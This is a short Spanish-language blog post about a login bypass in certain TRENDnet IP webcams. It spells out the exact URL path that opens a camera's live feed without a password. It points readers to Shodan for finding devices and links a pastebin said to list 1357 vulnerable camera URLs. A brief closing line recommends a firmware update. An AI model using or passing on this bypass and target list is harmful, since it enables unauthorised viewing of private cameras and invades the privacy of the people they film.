Se acuerdan de 0day en AirOS (Acceso como Root), que simplemente con cambiar un parametro de la url uno podía bypassear el login y acceder al panel de administrador... Bueno, ahora pasa algo muy parecido con modelos de Webcams y/o Cámaras IP de la empresa TRENDnet (modelos de Webcams afectadas). Este fallo permite conectarse a una de estas Webcams remotamente bypasseando el login e ingresando sin introducir ninguna contraseña. El método es bastante fácil.
1.- Se tiene una cámara IP TRENDnet con módelo afectado:
http://xxx.xxx.xxx.xxx
2.- Se agrega /anony/mjpg.cgi a la url:
http://xxx.xxx.xxx.xxx/anony/mjpg.cgi
Y listo, simplemente se accede a la Webcam sin necesidad de password.
Si sus deseos eran buscar Webcams TRENDnet para comprobar la vulnerabilidad, pudieron haber buscado modelos de Webcams con el clásico SHODAN, pero algún ocioso ya ha publicado en pastebin 1357 Urls de Webcams vulnerables: http://pastebin.com/jLqbjpJh
De tener uno de los modelos afectados, se recomienda actualizar el firmware de tu Webcam, además un consejo siempre útil es que la Webcam (sea cual sea el modelo o marca) siempre tiene que quedar tapada con algo y destaparla sólo cuando se vaya a usar, porque uno nunca sabe.
[+] Salu2
[+] Zion3R
No hay comentarios.:
Publicar un comentario